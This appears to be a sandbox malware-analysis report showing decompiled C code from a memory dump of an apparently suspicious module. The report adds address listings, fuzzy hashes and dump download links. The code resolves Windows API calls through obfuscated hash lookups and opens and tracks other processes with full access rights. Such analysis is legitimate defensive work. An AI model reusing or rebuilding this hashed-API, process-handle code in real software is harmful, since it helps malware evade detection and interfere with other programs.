								E708CF8C4( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E708CF558( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E708CF8C4( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 4);
								 *(E708CF558( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E708CF558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E708D2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E708CF558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E708CF8C4( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E708CF558( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E708CF558(_t439 + 0x28,  *(_t439 + 0x70));
										E708CF8C4( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 4);
										 *(E708CF558( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E708CF558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E708CF558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E708CF568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E708CF568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E708CF558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E708CF558( *((intOrPtr*)(_t439 + 4)), _t420);
										E708D382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E708CF568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E708CF8C4( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E708D2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E708CF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E708CF568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E708CF568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E708CF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E708CF558( *((intOrPtr*)(_t439 + 8)), _t422);
										E708D382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E708CF568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E708CF8C4( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E708CF558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x708ca5ae
0x708ca5b0
0x708ca5bb
0x708ca5c1
0x708ca5c5
0x708ca5ca
0x708ca5d0
0x708ca5e0
0x00000000
0x708ca5e2
0x708ca5e2
0x708ca5ed
0x708ca5ed
0x708cab6b
0x708cab6d
0x708cab6e
0x708cabad
0x708cabb1
0x708cabbf
0x708cabcd
0x708cabcd
0x708cabb8
0x708cabd3
0x708cabd8
0x00000000
0x708cabd8
0x708cabbc
0x708cabbd
0x00000000
0x708ca5f7
0x708ca5f7
0x708ca5fb
0x708ca702
0x708ca702
0x708ca707
0x708ca818
0x708ca81c
0x708ca821
0x708ca825
0x708ca94f
0x708ca951
0x708ca955
0x708ca95e
0x708ca967
0x708ca96b
0x708ca974
0x708ca97b
0x708ca97c
0x708ca980
0x708ca984
0x708ca988
0x708ca98a
0x708caaf4
0x708caaf4
0x708caafc
0x708cab14
0x708cab16
0x708cab18
0x708cab52
0x708cab52
0x708cab54
0x708cab54
0x708cab57
0x708cab72
0x708cab86
0x708cab89
0x708cab8e
0x708cab99
0x708cab9a
0x708cab9d
0x708cab9f
0x708caba8
0x00000000
0x708caba8
0x708cab59
0x708cab5d
0x708cab66
0x00000000
0x708cab66
0x708cab29
0x708cab39
0x708cab3d
0x708cab3d
0x708cab40
0x708cab43
0x708cab46
0x708cab4c
0x00000000
0x00000000
0x00000000
0x708cab4e
0x708ca992
0x708ca992
0x708ca994
0x708ca998
0x708ca99d
0x708ca99f
0x708ca9a3
0x708ca9a6
0x708ca9ae
0x708ca9b0
0x00000000
0x00000000
0x708ca9c7
0x708ca9e2
0x708ca9e4
0x708ca9f7
0x708ca9f9
0x708ca9fb
0x708caa16
0x708caa16
0x708caa1a
0x708caa1c
0x00000000
0x00000000
0x708caa1e
0x708caa21
0x708caa42
0x708caa61
0x708caa67
0x708caa6a
0x708caa6f
0x708caa70
0x708caa74
0x00000000
0x00000000
0x708caa7c
0x708caa7c
0x708caa7e
0x708caa8a
0x708caa96
0x708caaa0
0x708caaa3
0x708caaa6
0x708caaaa
0x708caab1
0x708caab5
0x708caab9
0x708caaba
0x708caabe
0x708caac3
0x708caac8
0x708caacc
0x708caad0
0x708caad6
0x708caadc
0x708caae2
0x708caae8
0x708caaed
0x708caaee
0x708caaee
0x00000000
0x708caa7e
0x00000000
0x708caa21
0x708ca9ff
0x708caa10
0x708caa12
0x708caa14
0x00000000
0x00000000
0x00000000
0x708caa14
0x708caa27
0x00000000
0x708caa27
0x708ca82b
0x708ca82e
0x708ca830
0x00000000
0x00000000
0x708ca838
0x708ca838
0x708ca83a
0x708ca83a
0x708ca84b
0x708ca84d
0x708ca850
0x00000000
0x00000000
0x708ca946
0x708ca947
0x708ca949
0x00000000
0x00000000
0x00000000
0x708ca949
0x708ca856
0x708ca859
0x708ca863
0x708ca868
0x708ca86a
0x708ca870
0x708ca877
0x708ca87b
0x708ca880
0x708ca884
0x708cacbf
0x708cacd3
0x708cacf6
0x708cacfb
0x708cacfb
0x708ca89b
0x708ca8a0
0x708ca8a0
0x708ca8a0
0x708ca8a0
0x708ca8a6
0x708ca8ab
0x708ca8ad
0x708ca8b2
0x708ca8b9
0x708ca8be
0x708ca8c0
0x708cac7d
0x708cac8e
0x708caca8
0x708cacad
0x708cacad
0x708ca8d6
0x708ca8db
0x708ca8db
0x708ca8db
0x708ca8db
0x708ca8ef
0x708ca90d
0x708ca912
0x708ca922
0x708ca93f
0x708ca941
0x708ca941
0x00000000
0x708ca859
0x708ca70f
0x708ca70f
0x708ca711
0x708ca718
0x708ca726
0x708ca728
0x708ca72b
0x708ca732
0x708ca734
0x708ca765
0x708ca774
0x708ca776
0x708ca778
0x708ca796
0x708ca798
0x708ca79a
0x708ca7ad
0x708ca7cc
0x708ca7d2
0x708ca7d5
0x708ca7ec
0x708ca808
0x708ca80a
0x708ca80a
0x708ca80a
0x708ca80a
0x708ca79a
0x00000000
0x708ca778
0x708ca738
0x708ca738
0x708ca73a
0x708ca74b
0x708ca74d
0x708ca74f
0x00000000
0x00000000
0x708ca75b
0x708ca75c
0x708ca763
0x00000000
0x00000000
0x00000000
0x708ca763
0x708ca751
0x708ca754
0x00000000
0x00000000
0x708ca80d
0x708ca80d
0x708ca80e
0x708ca80e
0x00000000
0x708ca601
0x708ca603
0x708ca603
0x708ca605
0x708ca60c
0x708ca61a
0x708ca61c
0x708ca620
0x708ca624
0x708ca626
0x708ca654
0x708ca657
0x708ca65c
0x708ca660
0x708ca665
0x708ca66c
0x708ca671
0x708ca673
0x708cac3a
0x708cac4b
0x708cac6b
0x708cac70
0x708cac70
0x708ca689
0x708ca68e
0x708ca68e
0x708ca68e
0x708ca68e
0x708ca6a0
0x708ca6a2
0x708ca6a4
0x708ca6b5
0x708ca6b5
0x708ca6bb
0x708ca6c0
0x708ca6c4
0x708ca6ca
0x708ca6d1
0x708ca6d6
0x708ca6d8
0x708cabee
0x708cabff
0x708cac20
0x708cac25
0x708cac25
0x708ca6ef
0x708ca6f4
0x708ca6f4
0x708ca6f4
0x708ca6f4
0x708ca6f7
0x708ca6f7
0x00000000
0x708ca6f7
0x708ca62a
0x708ca62a
0x708ca62c
0x708ca63d
0x708ca63f
0x708ca641
0x00000000
0x00000000
0x708ca64d
0x708ca64e
0x708ca652
0x00000000
0x00000000
0x00000000
0x708ca652
0x708ca643
0x708ca646
0x00000000
0x00000000
0x708ca6f8
0x708ca6f8
0x708ca6f9
0x708ca6f9
0x00000000
0x708ca605
0x708ca5fb

Strings

, xrefs: 708CABB3

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9a08dabef0d831041ce5158f442126be85dfea9df476880b12e2586ecce96e2e
Instruction ID: 5204b36bf2abcc7dcf2c2d69fa008cc4061d7b18f79ec379431eca9b9eab2f28
Opcode Fuzzy Hash: 9a08dabef0d831041ce5158f442126be85dfea9df476880b12e2586ecce96e2e
Instruction Fuzzy Hash: 28128F715082059FD715DF28C892B6FB7B7EF95614F008AADF59A9B2A1DB30EC01CB42

Uniqueness

Uniqueness Score: -1.00%

Function 708C84E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E708C84E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E708CB714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E708CF56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E708CF6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E708D218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E708CF558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E708CF568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E708CF568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E708CF558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E708CF558(_t435, _t451);
										E708D382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E708CF568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E708CF8C4(_t435, E708CF568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E708D2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E708CF558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E708CF568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E708CF568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E708CF558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E708CF558( *(_t458 + 4), _t453);
										E708D382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E708CF568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E708CF8C4( *(_t458 + 4), E708CF568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E708CF558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E708CF558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E708D2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E708CF558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E708CF8C4( *(_t458 + 4), E708CF568( *_t458) + 4);
										 *(E708CF558( *(_t458 + 4), E708CF568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E708CF558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E708CF8C4( *((intOrPtr*)(_t458 + 0x74)), E708CF568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E708CF558( *((intOrPtr*)(_t458 + 0x74)), E708CF568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E708CF558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E708CF6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E708CF558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E708CF568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E708CF568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E708CF558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E708CF558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E708D382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E708CF568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E708CF8C4( *(_t458 + 4), E708CF568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E708CF568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E708CF568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E708CF558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E708CF558(_t324, _t435);
										E708D382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E708CF568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E708CF8C4(_t324, E708CF568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E708CF8C4( *(_t458 + 4), E708CF568( *_t458) + 4);
								 *(E708CF558( *(_t458 + 4), E708CF568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E708CF8C4(_t324, E708CF568(_t324) + 4);
								 *((intOrPtr*)(E708CF558(_t324, E708CF568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E708CF620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E708CF620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E708CF558(_t458 + 0x14, 0);
						_t180 = E708D2878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E708CF558( *(_t458 + 4), _t316 << 2)));
								_t188 = E708CF558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E708CB680(_t458 + 0x34);
								E708CB680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E708CCB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E708CC33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E708CF8C4(_t458 + 0x14, E708CF568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E708CF558(_t458 + 0x14, E708CF568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E708D2F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E708CF8C4(_t458 + 0x40, E708CF568(_t458 + 0x3c) + 4);
										 *(E708CF558(_t458 + 0x40, E708CF568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E708CCDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E708CF558( *(_t458 + 4), _t437 * 4);
												_t212 = E708CF558(_t458 + 0x40, _t437 * 4);
												E708C8C14( *_t211, E708D034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E708CCDE0(_t458 + 0x4c, __eflags);
						L59:
						E708CB680(_t458 + 0x34);
						E708CB680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x708c84e4
0x708c84e8
0x708c84f1
0x708c84f7
0x708c84fb
0x708c84ff
0x708c850a
0x708c850e
0x708c8513
0x708c851b
0x708c852b
0x00000000
0x708c852d
0x708c8535
0x708c853c
0x708c853c
0x708c8a8f
0x708c8a91
0x708c8ad2
0x708c8ad4
0x708c8ae3
0x708c8aef
0x708c8ad6
0x708c8ade
0x708c8af5
0x708c8afa
0x00000000
0x708c8ae0
0x708c8ae2
0x00000000
0x708c8ae2
0x708c8ade
0x00000000
0x708c8546
0x708c854a
0x708c854d
0x708c8553
0x708c8553
0x708c8555
0x708c855c
0x708c856a
0x708c856c
0x708c8570
0x708c8572
0x708c859e
0x708c85a2
0x708c85a7
0x708c85ac
0x708c85b0
0x708c85b4
0x708c85bb
0x708c85c0
0x708c85c2
0x708c8b51
0x708c8b60
0x708c8b7f
0x708c8b84
0x708c8b84
0x708c85d5
0x708c85da
0x708c85de
0x708c85de
0x708c85de
0x708c85ef
0x708c85f1
0x708c85f3
0x708c8604
0x708c8604
0x708c8609
0x708c860e
0x708c8612
0x708c8617
0x708c861e
0x708c8623
0x708c8625
0x708c8b13
0x708c8b1f
0x708c8b39
0x708c8b3e
0x708c8b3e
0x708c863b
0x708c8640
0x708c8644
0x708c8644
0x708c8644
0x708c8644
0x708c8647
0x708c8647
0x708c8574
0x708c8576
0x708c8576
0x708c8578
0x708c8584
0x708c858b
0x708c858d
0x00000000
0x00000000
0x708c8599
0x708c859a
0x708c859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x708c859c
0x708c858f
0x708c8592
0x00000000
0x00000000
0x708c8594
0x708c8592
0x708c8648
0x708c864c
0x708c864d
0x708c864d
0x708c8555
0x708c8655
0x708c865a
0x708c8660
0x708c8660
0x708c8662
0x708c8669
0x708c8677
0x708c8679
0x708c867d
0x708c867f
0x708c8681
0x708c86bc
0x708c86cb
0x708c86cd
0x708c86cf
0x708c86ed
0x708c86ef
0x708c86f1
0x708c8703
0x708c8721
0x708c872a
0x708c872d
0x708c873b
0x708c874c
0x708c876a
0x708c876c
0x708c8770
0x708c8770
0x708c8770
0x708c86f1
0x708c8683
0x708c8687
0x708c8687
0x708c868c
0x708c8693
0x708c86a2
0x708c86a9
0x708c86ab
0x00000000
0x00000000
0x708c86b7
0x708c86b8
0x708c86ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x708c86ba
0x708c86ad
0x708c86b0
0x00000000
0x00000000
0x708c86b2
0x708c86b0
0x708c8772
0x708c8772
0x708c8773
0x708c8773
0x708c8662
0x708c8781
0x708c8786
0x708c878a
0x708c878e
0x708c8794
0x708c8796
0x708c8798
0x708c87a2
0x708c87a2
0x708c87a4
0x708c87a7
0x708c87a9
0x708c87b1
0x708c87b8
0x708c87bc
0x708c87bf
0x00000000
0x00000000
0x708c88bb
0x708c88bc
0x708c88be
0x00000000
0x00000000
0x00000000
0x708c88be
0x708c87c5
0x708c87c8
0x708c87d1
0x708c87d6
0x708c87d8
0x708c87e4
0x708c87e8
0x708c87ed
0x708c87f1
0x708c8bce
0x708c8be2
0x708c8c04
0x708c8c09
0x708c8c09
0x708c8807
0x708c880c
0x708c8810
0x708c8810
